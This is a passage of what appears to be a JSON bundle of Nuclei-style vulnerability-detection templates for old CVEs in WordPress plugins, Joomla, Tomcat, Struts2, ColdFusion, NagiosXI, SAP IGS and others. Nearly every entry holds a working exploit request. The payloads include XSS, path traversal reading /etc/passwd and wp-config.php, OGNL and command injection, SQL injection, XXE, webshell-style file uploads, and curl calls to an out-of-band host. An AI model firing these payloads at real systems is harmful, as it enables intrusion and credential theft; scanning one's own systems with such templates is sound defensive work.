name=\"ContactId\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000154","info":{"name":"WordPress WHIZZ <=1.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/whizz/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WHIZZ","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000155","info":{"name":"WordPress WPSOLR <=8.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wpsolr-search-engine/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WPSOLR Search Engine ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10956","info":{"name":"WordPress Mail Masta 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd","{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2016-1000141","info":{"name":"WordPress Page Layout builder v1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/page-layout-builder/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Page Layout Builder ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-4764","info":{"name":"Joomla! <=2.0.0 RC2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6080","info":{"name":"Joomla! ionFiles 4.4.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1547","info":{"name":"Microsoft OWA Exchange Server 2003 - 'redir.asp' Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/exchweb/bin/redir.asp?URL=https://interact.sh","{{BaseURL}}/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2008-1061","info":{"name":"WordPress Sniplets <=1.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Code Snippets"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2650","info":{"name":"CMSimple 3.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2398","info":{"name":"AppServ Open Project <=2.5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=confirm('xss')>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6465","info":{"name":"Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webshell4/login.php?errcode=0&login=\\%22%20onfocus=alert(document.domain);%20autofocus%20\\%22&err=U"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\\\" onfocus=alert(document.domain); autofocus","Please enter login name &amp; password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-7269","info":{"name":"UC Gateway Investment SiteEngine v5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api.php?action=logout&forward=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2008-6982","info":{"name":"Devalcms 1.4a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sub menu for: <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2008-5587","info":{"name":"phpPgAdmin <=4.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-4668","info":{"name":"Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6172","info":{"name":"Joomla! Component RWCards 3.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1059","info":{"name":"WordPress Sniplets 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6222","info":{"name":"Joomla! ProDesk 1.0/1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6668","info":{"name":"nweb2fax <=0.2.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd","{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-2449","info":{"name":"Apache Tomcat 4.x-7.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Request URI: /examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp","JSP Request Method"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-3010","info":{"name":"Alcatel-Lucent OmniPCX - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/masterCGI?ping=nomip&user=;id;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=[0-9]+.*gid=[0-9]+.*"]},{"type":"word","part":"body","words":["<TITLE>master</TITLE>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4556","info":{"name":"OpenSymphony XWork/Apache Struts2 - Remote Code Execution","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login.action"],"body":"username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4504","info":{"name":"Joomla! RSfiles <=1.0.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-5728","info":{"name":"phpPgAdmin <=4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","phpPgAdmin"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-0885","info":{"name":"Jira Rainbow.Zen - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16716","info":{"name":"NCBI ToolBox - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10818","info":{"name":"LG NAS Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /system/sharedir.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n","POST /en/php/usb_sync.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-14918","info":{"name":"LOYTEC LGATE-902 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000671","info":{"name":"Sympa version =>6.2.16 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email="],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-15961","info":{"name":"Adobe ColdFusion - Unrestricted File Upload Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------24464570528145\n\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\nContent-Type: image/jpeg\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2018-15961\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"path\"\n\n{{randstr}}.jsp\n-----------------------------24464570528145--\n","GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["ddbb3e76f92e78c445c8ecb392beb225"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16836","info":{"name":"Rubedo CMS <=3.4.0 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7490","info":{"name":"uWSGI PHP Plugin Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11784","info":{"name":"Apache Tomcat - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*\\.)?interact\\.sh\\/?(\\/.*)?$"]},{"type":"status","negative":true,"status":[404]}]}]},{"id":"CVE-2018-0296","info":{"name":"Cisco ASA - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"],"headers":{"Accept-Encoding":"deflate"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["///sessions"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9205","info":{"name":"Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19458","info":{"name":"PHP Proxy 3.0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7662","info":{"name":"CouchCMS <= 2.0 - Path Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/mysql2i/mysql2i.func.php","{{BaseURL}}/addons/phpmailer/phpmailer.php"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["mysql2i.func.php on line 10","Fatal error: Cannot redeclare mysql_affected_rows() in"],"condition":"and"},{"type":"word","part":"body","words":["phpmailer.php on line 10","Fatal error: Call to a menber function add_event_listener() on a non-object in"],"condition":"and"}]}]},{"id":"CVE-2018-18264","info":{"name":"Kubernetes Dashboard <1.10.1 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs","{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"apiVersion\") && contains(body, \"objectRef\")"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14064","info":{"name":"VelotiSmart Wifi - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10738","info":{"name":"NagiosXI <= 5.4.12 menuaccess.php - SQL injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/nagiosql/admin/menuaccess.php"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"selSubMenu=1&subSave=1&chbKey1=-1%' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-2392","info":{"name":"SAP Internet Graphics Server (IGS) - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /XMLCHART HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary={{randstr_1}}\n\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_2}}\"; filename=\"{{randstr_3}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <ChartData>\n      <Categories>\n        <Category>ALttP</Category>\n      </Categories>\n      <Series label=\"{{randstr_4}}\">\n        <Point>\n          <Value type=\"y\">12345</Value>\n        </Point>\n      </Series>\n    </ChartData>\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_5}}\"; filename=\"{{randstr_6}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <!DOCTYPE Extension [<!ENTITY xxe SYSTEM \"/etc/passwd\">]>\n    <SAPChartCustomizing version=\"1.1\">\n      <Elements>\n        <ChartElements>\n          <Title>\n            <Extension>&xxe;</Extension>\n          </Title>\n        </ChartElements>\n      </Elements>\n    </SAPChartCustomizing>\n--{{randstr_1}}--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Picture","Info","/output/"],"condition":"and"},{"type":"word","part":"body","words":["ImageMap","Errors"],"condition":"or"},{"type":"word","part":"header","words":["text/html","SAP Internet Graphics Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19751","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/ssl-fields/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test\n","GET /admin/ssl-fields/ HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19136","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>&really_del=1\">YES"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10737","info":{"name":"NagiosXI <= 5.4.12 logbook.php SQL injection","severity":"high"},"requests":[{"raw":["POST /nagiosql/admin/logbook.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntxtSearch=' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#\n"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-3238","info":{"name":"Oracle Fusion Middleware WebCenter Sites 11.1.1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Variables.cs_imagedir"],"condition":"and"}]}]},{"id":"CVE-2018-19914","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/dns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E\n","GET /assets/dns.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-7251","info":{"name":"Anchor CMS 0.12.3 - Error Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/anchor/errors.log"],"matchers":[{"type":"word","words":["\"date\":","\"message\":","\"trace\":["],"condition":"and"}]}]},{"id":"CVE-2018-20009","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes=\n","GET /assets/ssl-providers.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-5316","info":{"name":"WordPress SagePay Server Gateway for WooCommerce <1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=</script>\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script>\"><script>alert(document.domain)</script>","Authenticate your card"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15535","info":{"name":"Responsive FileManager <9.13.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12675","info":{"name":"SV3C HD Camera L Series - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"word","part":"body","words":["<META http-equiv=\"Refresh\" content=\"0;URL=http://interact.sh\">"]}]}]},{"id":"CVE-2018-19386","info":{"name":"SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"],"matchers-condition":"and","matchers":[{"type":"word","words":["<a href=\"javascript:alert(document.domain)//"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10942","info":{"name":"Prestashop AttributeWizardPro Module - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /modules/{{paths}}/file_upload.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=ba1f796d0aa2482e9c51c81ae6087818\n\n--ba1f796d0aa2482e9c51c81ae6087818\nContent-Disposition: form-data; name=\"userfile\"; filename=\"{{filename}}.php\"\nContent-Type: multipart/form-data\n\n{{randstr}}\n--ba1f796d0aa2482e9c51c81ae6087818--\n","GET /modules/{{paths}}/file_uploads/{{file}}  HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"paths":["attributewizardpro","1attributewizardpro","attributewizardpro.OLD","attributewizardpro_x"]},"stop-at-first-match":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{{filename}}"]},{"type":"word","part":"body_2","words":["{{randstr}}"]}],"extractors":[{"type":"regex","name":"file","part":"body_1","internal":true,"group":1,"regex":["(.*?)\\|\\|\\|\\|"]}]}]},{"id":"CVE-2018-18777","info":{"name":"Microstrategy Web 7 - Local File 